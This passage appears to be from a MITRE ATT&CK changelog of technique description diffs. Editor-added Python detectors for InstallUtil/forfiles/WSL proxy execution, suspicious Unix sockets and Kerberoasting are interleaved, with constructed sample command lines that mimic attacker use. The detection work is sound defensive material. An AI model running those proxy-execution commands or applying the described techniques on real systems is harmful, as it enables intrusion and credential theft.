| x_mitre_data_sources | Command: Command Execution | |
| Description |
|---|
| Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-24 18:21:08.497000+00:00 | 2022-03-08 21:05:20.658000+00:00 |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | File: File Modification |
| x_mitre_data_sources[1] | Driver: Driver Load | Process: Process Creation |
| x_mitre_data_sources[3] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[4] | File: File Modification | Process: Process Metadata |
| x_mitre_data_sources[5] | Process: Process Metadata | Driver: Driver Load |
| Old Description | New Description |
|---|---|
| Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v. InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
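Both the Indirect Command Execution entry earlier on this page (Forfiles, pcalua.exe, WSL) and the InstallUtil entry above describe the same defensive problem: a signed Microsoft binary runs something on the adversary's behalf, so watching for cmd.exe alone misses it. The following is an added example by the editor, not code from the ATT&CK page or any product, and it serves both entries: it inspects constructed process-creation events for those proxy binaries, matching each one's execution switch (`/c` for forfiles, `-a` for pcalua, `-e`/`-c` for WSL, `/u` for InstallUtil, which runs the RunInstaller class's uninstall path without an install) and also flags any child process of a proxy binary via the parent/child relationship. The event shapes, pids, paths and the "user-writable path" heuristic for InstallUtil are editor assumptions.

```python
"""Added example (editor's illustration, not part of the ATT&CK changelog):
flag indirect/proxied execution through forfiles.exe, pcalua.exe, WSL
(T1202) and InstallUtil.exe (T1218.004) from process-creation events,
using both the proxy's own command line and the parent/child relationship."""
import ntpath
import re

PROXY_BINARIES = {"forfiles.exe", "pcalua.exe", "wsl.exe", "bash.exe", "installutil.exe"}

# Paths a legitimate installer or scheduled job would rarely load a .NET
# assembly from (heuristic assumption, not an ATT&CK statement).
USER_WRITABLE = re.compile(r"\\(?:Users|ProgramData|Temp|Windows\\Temp)\\", re.I)

# Per-binary switch that turns the utility into a launcher.
PROXY_RULES = {
    "forfiles.exe": (re.compile(r"(?:^|\s)/c\s", re.I),
                     "forfiles /c runs an arbitrary command per matched file"),
    "pcalua.exe": (re.compile(r"(?:^|\s)-a\s+\S+", re.I),
                   "Program Compatibility Assistant launching a program"),
    "wsl.exe": (re.compile(r"(?:^|\s)(?:-e|--exec|-c)\s", re.I),
                "WSL executing a Linux command"),
    "bash.exe": (re.compile(r"(?:^|\s)-c\s", re.I),
                 "WSL bash -c executing a command"),
    "installutil.exe": (re.compile(r"(?:^|\s)/u(?:ninstall)?\b", re.I),
                        "InstallUtil /u: runs the RunInstaller class's uninstall path without installing"),
}


def _basename(image):
    # ntpath handles Windows paths on any platform.
    return ntpath.basename(image).lower()


def detect_proxy_execution(events):
    """events: list of {"pid", "ppid", "image", "cmdline"} -> {pid: [reasons]}."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        reasons = []
        name = _basename(e["image"])
        if name in PROXY_RULES:
            rx, why = PROXY_RULES[name]
            if rx.search(e["cmdline"]):
                reasons.append(why)
            if name == "installutil.exe" and USER_WRITABLE.search(e["cmdline"]):
                reasons.append("InstallUtil loading an assembly from a user-writable path")
        parent = by_pid.get(e["ppid"])
        if parent and _basename(parent["image"]) in PROXY_BINARIES:
            reasons.append(f"child of {_basename(parent['image'])} (proxied execution)")
        if reasons:
            findings[e["pid"]] = reasons
    return findings


# Constructed sample events (Sysmon-like fields, reduced to what is needed).
_INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles.exe /p C:\Windows\System32 /m calc.exe /c "cmd /c calc.exe"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c calc.exe"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\pcalua.exe",
     "cmdline": r"pcalua.exe -a C:\Users\bob\AppData\Local\Temp\update.exe"},
    {"pid": 400, "ppid": 100, "image": _INSTALLUTIL,
     "cmdline": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\bob\AppData\Local\Temp\tool.dll"},
    {"pid": 500, "ppid": 100, "image": _INSTALLUTIL,
     "cmdline": r'InstallUtil.exe "C:\Program Files\Vendor\Service.exe"'},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\wsl.exe", "cmdline": "wsl.exe -e /bin/sh -c id"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\bob\notes.txt"},
]

if __name__ == "__main__":
    for pid, reasons in detect_proxy_execution(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The parent/child rule is the one worth keeping even if the switch patterns age: forfiles and pcalua have no business being anyone's parent on a workstation, and a cmd.exe whose parent is forfiles.exe is exactly the launch that a rule keyed on cmd.exe's own parent being explorer or a script host would otherwise accept. The InstallUtil install at pid 500 (vendor path, no `/u`) is left alone on purpose; on a fleet where InstallUtil is never used interactively, drop the heuristics and alert on every execution.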
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:34:46.529000+00:00 | 2022-03-11 18:47:52.603000+00:00 |
| description | Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) | Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). 
Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) |
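The added Linux sentence above names sockets and pipes as the IPC mechanisms an adversary can abuse for execution, but gives no handle for finding them. The following is an added check by the editor, not code from the ATT&CK page: it parses the `/proc/net/unix` table and reports listening Unix-domain stream sockets bound in world-writable directories or in the abstract namespace, the endpoints a local command-execution backdoor would expose. The table text is constructed, and the suspect and allowlisted path prefixes are editor assumptions about a typical Linux host (the X11 and ICE sockets legitimately live under /tmp).

```python
"""Added example (editor's illustration, not part of the ATT&CK changelog):
parse /proc/net/unix to find listening Unix-domain stream sockets in
world-writable or abstract namespaces, the kind of IPC endpoint a local
command-execution backdoor would expose (T1559 on Linux)."""

SO_ACCEPTCON = 0x00010000   # Flags bit set on a listening socket
SOCK_STREAM = 1             # Type column; 2 is SOCK_DGRAM

# Directories where a listening socket deserves a look (assumption: typical
# server/workstation layout); known legitimate residents are allowlisted.
SUSPECT_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
ALLOWLIST_PREFIXES = ("/tmp/.X11-unix/", "/tmp/.ICE-unix/")


def parse_proc_net_unix(text):
    """Rows of /proc/net/unix as dicts. Columns:
    Num RefCount Protocol Flags Type St Inode Path (Path may be absent)."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the header
        parts = line.split(None, 7)              # keep spaces inside Path
        if len(parts) < 7:
            continue
        rows.append({
            "refcount": int(parts[1], 16),
            "flags": int(parts[3], 16),
            "type": int(parts[4], 16),
            "state": int(parts[5], 16),
            "inode": int(parts[6]),
            "path": parts[7] if len(parts) == 8 else "",
        })
    return rows


def suspicious_listeners(text):
    """Listening stream sockets whose bind path is abstract or in a suspect dir."""
    found = []
    for row in parse_proc_net_unix(text):
        if not (row["flags"] & SO_ACCEPTCON) or row["type"] != SOCK_STREAM:
            continue                              # not accepting connections
        path = row["path"]
        if not path:
            continue                              # unnamed (socketpair), no path to reach
        if path.startswith(ALLOWLIST_PREFIXES):
            continue
        abstract = path.startswith("@")           # abstract namespace: no file, no perms
        if abstract or path.startswith(SUSPECT_PREFIXES):
            found.append({"path": path, "inode": row["inode"], "abstract": abstract})
    return found


# Constructed /proc/net/unix content (not captured from a real host).
SAMPLE_PROC_NET_UNIX = """\
Num       RefCount Protocol Flags    Type St Inode Path
0000000000000000: 00000002 00000000 00010000 0001 01 17420 /run/systemd/journal/stdout
0000000000000000: 00000002 00000000 00010000 0001 01 21093 /tmp/.X11-unix/X0
0000000000000000: 00000002 00000000 00010000 0001 01 33412 /tmp/.s.agent
0000000000000000: 00000003 00000000 00000000 0001 03 33413 /tmp/.s.agent
0000000000000000: 00000002 00000000 00010000 0001 01 40001 @/tmp/.ipc_upd
0000000000000000: 00000002 00000000 00010000 0001 01 40002 /dev/shm/.sock
0000000000000000: 00000002 00000000 00000000 0002 01 40003
"""

if __name__ == "__main__":
    for hit in suspicious_listeners(SAMPLE_PROC_NET_UNIX):
        print(hit)
```

The inode is the pivot to the owning process: `ss -xlp` prints it together with the listening pid, or walk `/proc/*/fd` for a `socket:[inode]` link. The same sweep for named pipes is a filesystem walk (`find / -type p`) rather than a /proc table, since a FIFO is just a file; the connected entry for `/tmp/.s.agent` (state 03, no ACC flag) is deliberately not reported twice, but its presence tells you someone is already talking to the listener.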
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:48:30.432000+00:00 | 2022-03-11 20:23:23.122000+00:00 |
| description | Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) | Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). 
Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) |
| external_references[1]['source_name'] | Fireeye Hunting COM June 2019 | Linux IPC |
| external_references[1]['description'] | Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019. | N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022. |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html | https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_data_sources[2] | Script: Script Execution | Process: Process Access |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Fireeye Hunting COM June 2019', 'description': 'Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html'} | |
| x_mitre_data_sources | Script: Script Execution | |
| x_mitre_platforms | Linux | |
| Old Description | New Description |
|---|---|
| An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 22:57:04.784000+00:00 | 2022-07-28 18:55:35.988000+00:00 |
| description | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) |
| external_references[1]['source_name'] | Novetta Blockbuster | Novetta Blockbuster Destructive Malware |
| external_references[1]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. |
| external_references[1]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| external_references[2]['source_name'] | Novetta Blockbuster Destructive Malware | Novetta Blockbuster |
| external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[2]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) | Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 14:32:14.273000+00:00 | 2022-03-08 21:29:30.249000+00:00 |
| description | Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) | Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) |
| x_mitre_detection | Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017) | Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing campaigns.(Citation: Trend Micro When Phishing Starts from the Inside 2017) |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) | Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) |
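The description above explains that any principal holding a TGT can request RC4 (etype 23) service tickets for every SPN in the domain and crack them offline, which leaves the domain controller with a distinctive trace: one requester obtaining RC4 tickets to many service accounts in a short time. As an added example that is not part of the ATT&CK entry, the following Python triages Windows Security Event ID 4769 (TGS request) records for that pattern. The field names follow the 4769 schema (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status); the events themselves, including every user, service name, address and timestamp, are constructed.

```python
"""Kerberoasting triage over Windows Security Event ID 4769 (TGS request) records.

Added example; it is not part of the ATT&CK entry. The events are constructed:
field names follow the 4769 schema, every value is invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # Kerberos etype 23 (RC4-HMAC): the TGS-REP type cracked offline in Kerberoasting


def ev(time, user, service, etype, ip="::ffff:10.0.0.5", status="0x0"):
    """Build one constructed 4769 record."""
    return {"time": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


SAMPLE_4769 = [
    # normal activity: AES tickets to a workstation and to krbtgt
    ev("2022-03-08T09:00:01", "jdoe@CORP.LOCAL", "WS01$", "0x12"),
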